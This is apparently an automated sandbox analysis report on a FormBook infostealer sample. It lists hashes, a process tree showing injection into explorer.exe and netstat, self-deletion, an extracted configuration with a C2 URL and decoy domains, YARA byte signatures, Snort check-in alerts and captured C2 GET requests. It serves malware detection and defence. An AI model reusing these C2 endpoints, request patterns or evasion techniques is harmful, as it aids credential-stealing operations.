Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Fu94e0b1TR

Overview

General Information

Sample Name:Fu94e0b1TR (renamed file extension from none to exe)
Analysis ID:502374
MD5:6429aa83e4bc083b4f0b3f44b0d7950f
SHA1:0ead59881f054284f611accb61451ed1ffc818fc
SHA256:96c57ae661562e958e01bb0b490c09a0a51bb367931620223174963de88bdfcb
Tags:32exetrojan
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Uses netstat to query active network connections and open ports
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • Fu94e0b1TR.exe (PID: 4628 cmdline: 'C:\Users\user\Desktop\Fu94e0b1TR.exe' MD5: 6429AA83E4BC083B4F0B3F44B0D7950F)
    • Fu94e0b1TR.exe (PID: 4840 cmdline: C:\Users\user\Desktop\Fu94e0b1TR.exe MD5: 6429AA83E4BC083B4F0B3F44B0D7950F)
    • Fu94e0b1TR.exe (PID: 2848 cmdline: C:\Users\user\Desktop\Fu94e0b1TR.exe MD5: 6429AA83E4BC083B4F0B3F44B0D7950F)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • NETSTAT.EXE (PID: 3204 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
          • cmd.exe (PID: 1844 cmdline: /c del 'C:\Users\user\Desktop\Fu94e0b1TR.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.fis.photos/ef6c/"], "decoy": ["gicaredocs.com", "govusergroup.com", "conversationspit.com", "brondairy.com", "rjtherealest.com", "xn--9m1bq8wgkag3rjvb.com", "mylori.net", "softandcute.store", "ahljsm.com", "shacksolid.com", "weekendmusecollection.com", "gaminghallarna.net", "pgonline111.online", "44mpt.xyz", "ambrandt.com", "eddytattoo.com", "blendeqes.com", "upinmyfeels.com", "lacucinadesign.com", "docomoau.xyz", "xn--90armbk7e.online", "xzq585858.net", "kidzgovroom.com", "lhznqyl.press", "publicationsplace.com", "jakante.com", "csspadding.com", "test-testjisdnsec.store", "lafabriqueabeilleassurances.com", "clf010.com", "buybabysnuggle.com", "uzmdrmustafaalperaykanat.com", "levanttradegroup.com", "arcflorals.com", "kinglot2499.com", "freekagyans.com", "region10group.gmbh", "yeyelm744.com", "thehomedesigncentre.com", "vngc.xyz", "szesdkj.com", "charlottewright.online", "planetgreennetwork.com", "pacifica7.com", "analogueadapt.com", "sensorypantry.com", "narbaal.com", "restaurant-utopia.xyz", "golnay.com", "szyyglass.com", "redelirevearyseuiop.xyz", "goldsteelconstruction.com", "discovercotswoldcottages.com", "geniuseven.net", "apricitee.com", "stopmoshenik.online", "ya2gh.com", "instatechnovelz.com", "dbe648.com", "seifjuban.com", "conquershirts.store", "totalcovidtravel.com", "pamperotrabajo.com", "satellitphonestore.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19b77:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16aa9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bbc:$sqlite3step: 68 34 1C 7B E1
    • 0x16ad8:$sqlite3text: 68 38 2A 90 C5
    • 0x16bfd:$sqlite3text: 68 38 2A 90 C5
    • 0x16aeb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c13:$sqlite3blob: 68 53 D8 7F 8C
    00000000.00000002.277178151.0000000002B11000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
      00000012.00000002.513567456.0000000000A20000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
        Click to see the 24 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        6.2.Fu94e0b1TR.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          6.2.Fu94e0b1TR.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18d77:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          6.2.Fu94e0b1TR.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x15ca9:$sqlite3step: 68 34 1C 7B E1
          • 0x15dbc:$sqlite3step: 68 34 1C 7B E1
          • 0x15cd8:$sqlite3text: 68 38 2A 90 C5
          • 0x15dfd:$sqlite3text: 68 38 2A 90 C5
          • 0x15ceb:$sqlite3blob: 68 53 D8 7F 8C
          • 0x15e13:$sqlite3blob: 68 53 D8 7F 8C
          6.2.Fu94e0b1TR.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            6.2.Fu94e0b1TR.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
            • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
            • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
            • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
            • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
            • 0x19b77:$sequence_8: 3C 54 74 04 3C 74 75 F4
            • 0x1ac1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
            Click to see the 8 entries

            Sigma Overview

            No Sigma rule has matched

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.fis.photos/ef6c/"], "decoy": ["gicaredocs.com", "govusergroup.com", "conversationspit.com", "brondairy.com", "rjtherealest.com", "xn--9m1bq8wgkag3rjvb.com", "mylori.net", "softandcute.store", "ahljsm.com", "shacksolid.com", "weekendmusecollection.com", "gaminghallarna.net", "pgonline111.online", "44mpt.xyz", "ambrandt.com", "eddytattoo.com", "blendeqes.com", "upinmyfeels.com", "lacucinadesign.com", "docomoau.xyz", "xn--90armbk7e.online", "xzq585858.net", "kidzgovroom.com", "lhznqyl.press", "publicationsplace.com", "jakante.com", "csspadding.com", "test-testjisdnsec.store", "lafabriqueabeilleassurances.com", "clf010.com", "buybabysnuggle.com", "uzmdrmustafaalperaykanat.com", "levanttradegroup.com", "arcflorals.com", "kinglot2499.com", "freekagyans.com", "region10group.gmbh", "yeyelm744.com", "thehomedesigncentre.com", "vngc.xyz", "szesdkj.com", "charlottewright.online", "planetgreennetwork.com", "pacifica7.com", "analogueadapt.com", "sensorypantry.com", "narbaal.com", "restaurant-utopia.xyz", "golnay.com", "szyyglass.com", "redelirevearyseuiop.xyz", "goldsteelconstruction.com", "discovercotswoldcottages.com", "geniuseven.net", "apricitee.com", "stopmoshenik.online", "ya2gh.com", "instatechnovelz.com", "dbe648.com", "seifjuban.com", "conquershirts.store", "totalcovidtravel.com", "pamperotrabajo.com", "satellitphonestore.com"]}
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 6.2.Fu94e0b1TR.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.Fu94e0b1TR.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Fu94e0b1TR.exe.3c84fc0.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Fu94e0b1TR.exe.3c3ada0.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.513567456.0000000000A20000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.333414635.000000000FAD6000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.513760624.0000000000A50000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.311554346.000000000FAD6000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.371224121.0000000000F20000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.282740924.0000000003B19000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.371120002.0000000000CF0000.00000040.00020000.sdmp, type: MEMORY
            Source: 6.2.Fu94e0b1TR.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: Fu94e0b1TR.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: Fu94e0b1TR.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: netstat.pdbGCTL source: Fu94e0b1TR.exe, 00000006.00000002.371455073.0000000001150000.00000040.00020000.sdmp
            Source: Binary string: netstat.pdb source: Fu94e0b1TR.exe, 00000006.00000002.371455073.0000000001150000.00000040.00020000.sdmp
            Source: Binary string: wntdll.pdbUGP source: Fu94e0b1TR.exe, 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, NETSTAT.EXE, 00000012.00000002.515622767.0000000002D20000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: Fu94e0b1TR.exe, NETSTAT.EXE
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 4x nop then pop ebx6_2_00406ABB
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 4x nop then pop edi6_2_0040C37C
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 4x nop then pop edi6_2_0040C3E9
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop ebx18_2_003C6ABB
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop edi18_2_003CC37C
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop edi18_2_003CC3E9

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49795 -> 64.190.62.111:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49795 -> 64.190.62.111:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49795 -> 64.190.62.111:80
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49797 -> 192.0.78.24:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49797 -> 192.0.78.24:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49797 -> 192.0.78.24:80
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeDomain query: www.instatechnovelz.com
            Source: C:\Windows\explorer.exeNetwork Connect: 172.65.227.72 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.apricitee.com
            Source: C:\Windows\explorer.exeDomain query: www.shacksolid.com
            Source: C:\Windows\explorer.exeNetwork Connect: 64.190.62.111 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.brondairy.com
            Uses netstat to query active network connections and open portsShow sources
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: www.fis.photos/ef6c/
            Source: Joe Sandbox ViewASN Name: NBS11696US NBS11696US
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: global trafficHTTP traffic detected: GET /ef6c/?BJB=7nO80D&yrTlglv8=KSHN/72DEJPyd/OuGOIXNFBSZoOhZSSqcZP1Rqc2bg8KEPsXLZdPsQK+HlsXn3Jp1PaC HTTP/1.1Host: www.apricitee.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ef6c/?yrTlglv8=JeohSOzXiZYIapiQlSWyFy7AWxQU0a2IMxMIOt5NBtSaZYcWimwRehmIZ/KtIrBMaY3r&BJB=7nO80D HTTP/1.1Host: www.shacksolid.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox ViewIP Address: 64.190.62.111 64.190.62.111
            Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: Fu94e0b1TR.exe, 00000000.00000003.252645289.00000000059A1000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: Fu94e0b1TR.exe, 00000000.00000002.277178151.0000000002B11000.00000004.00000001.sdmpString found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
            Source: Fu94e0b1TR.exe, 00000000.00000002.285145562.0000000005964000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: Fu94e0b1TR.exe, 00000000.00000003.257245826.000000000599C000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/%
            Source: Fu94e0b1TR.exe, 00000000.00000003.257106060.0000000005999000.00000004.00000001.sdmp, Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: Fu94e0b1TR.exe, 00000000.00000003.260583802.000000000596F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
            Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: Fu94e0b1TR.exe, 00000000.00000003.260583802.000000000596F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlr
            Source: Fu94e0b1TR.exe, 00000000.00000003.259708004.000000000596F000.00000004.00000001.sdmp, Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: Fu94e0b1TR.exe, 00000000.00000003.259327134.0000000005999000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.htmlx
            Source: Fu94e0b1TR.exe, 00000000.00000003.259563222.0000000005999000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers5
            Source: Fu94e0b1TR.exe, 00000000.00000003.259630894.0000000005999000.00000004.00000001.sdmp, Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: Fu94e0b1TR.exe, 00000000.00000003.267018453.0000000005999000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersK
            Source: Fu94e0b1TR.exe, 00000000.00000003.258524788.0000000005999000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersP
            Source: Fu94e0b1TR.exe, 00000000.00000003.267018453.0000000005999000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersiva
            Source: Fu94e0b1TR.exe, 00000000.00000003.259708004.000000000596F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com7
            Source: Fu94e0b1TR.exe, 00000000.00000003.260965748.000000000596F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comD
            Source: Fu94e0b1TR.exe, 00000000.00000003.260965748.000000000596F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comF
            Source: Fu94e0b1TR.exe, 00000000.00000003.259708004.000000000596F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comFk
            Source: Fu94e0b1TR.exe, 00000000.00000003.260965748.000000000596F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comI.TTF
            Source: Fu94e0b1TR.exe, 00000000.00000003.259708004.000000000596F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comR.TTF
            Source: Fu94e0b1TR.exe, 00000000.00000003.260583802.000000000596F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comalicu
            Source: Fu94e0b1TR.exe, 00000000.00000003.260965748.000000000596F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comd
            Source: Fu94e0b1TR.exe, 00000000.00000003.260965748.000000000596F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comdito
            Source: Fu94e0b1TR.exe, 00000000.00000003.260965748.000000000596F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comessed
            Source: Fu94e0b1TR.exe, 00000000.00000003.260583802.000000000596F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comk
            Source: Fu94e0b1TR.exe, 00000000.00000003.259708004.000000000596F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comt
            Source: Fu94e0b1TR.exe, 00000000.00000003.259708004.000000000596F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comtuta
            Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: Fu94e0b1TR.exe, 00000000.00000003.252060604.000000000599A000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: Fu94e0b1TR.exe, 00000000.00000003.252293628.0000000005999000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/
            Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: Fu94e0b1TR.exe, 00000000.00000003.263851133.0000000005999000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/
            Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: Fu94e0b1TR.exe, 00000000.00000003.263851133.0000000005999000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/k
            Source: Fu94e0b1TR.exe, 00000000.00000003.264392875.000000000599E000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/denQ
            Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: Fu94e0b1TR.exe, 00000000.00000003.264185208.000000000597A000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmNormaldk
            Source: Fu94e0b1TR.exe, 00000000.00000003.263989086.0000000005999000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmS
            Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: Fu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmp, Fu94e0b1TR.exe, 00000000.00000003.254492265.000000000596C000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: Fu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/(
            Source: Fu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/)
            Source: Fu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp//lpk
            Source: Fu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/7
            Source: Fu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/D
            Source: Fu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0ro
            Source: Fu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/ch
            Source: Fu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
            Source: Fu94e0b1TR.exe, 00000000.00000003.254492265.000000000596C000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/D
            Source: Fu94e0b1TR.exe, 00000000.00000003.254492265.000000000596C000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/k
            Source: Fu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/ms
            Source: Fu94e0b1TR.exe, 00000000.00000003.253358837.0000000005963000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/nly
            Source: Fu94e0b1TR.exe, 00000000.00000003.253958296.0000000005968000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/nt
            Source: Fu94e0b1TR.exe, 00000000.00000003.254492265.000000000596C000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/t
            Source: Fu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/v
            Source: Fu94e0b1TR.exe, 00000000.00000003.253827230.000000000596D000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/y
            Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: Fu94e0b1TR.exe, 00000000.00000003.252359089.0000000005999000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.coma-e
            Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: Fu94e0b1TR.exe, 00000000.00000003.261217392.000000000596E000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de
            Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: Fu94e0b1TR.exe, 00000000.00000003.261217392.000000000596E000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deMT
            Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: NETSTAT.EXE, 00000012.00000002.518424149.00000000033D2000.00000004.00020000.sdmpString found in binary or memory: https://flow.page/rjdarealest/ef6c/?BJB=7nO80D&yrTlglv8=yyRuLH34I
            Source: NETSTAT.EXE, 00000012.00000002.518424149.00000000033D2000.00000004.00020000.sdmpString found in binary or memory: https://sedo.com/search/details/?partnerid=324561&language=e&domain=shacksolid.com&origin=sales_land
            Source: unknownDNS traffic detected: queries for: www.apricitee.com
            Source: global trafficHTTP traffic detected: GET /ef6c/?BJB=7nO80D&yrTlglv8=KSHN/72DEJPyd/OuGOIXNFBSZoOhZSSqcZP1Rqc2bg8KEPsXLZdPsQK+HlsXn3Jp1PaC HTTP/1.1Host: www.apricitee.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ef6c/?yrTlglv8=JeohSOzXiZYIapiQlSWyFy7AWxQU0a2IMxMIOt5NBtSaZYcWimwRehmIZ/KtIrBMaY3r&BJB=7nO80D HTTP/1.1Host: www.shacksolid.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

            E-Banking Fraud:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 6.2.Fu94e0b1TR.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.Fu94e0b1TR.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Fu94e0b1TR.exe.3c84fc0.2.raw.unpack, type: UNPACKEDPE
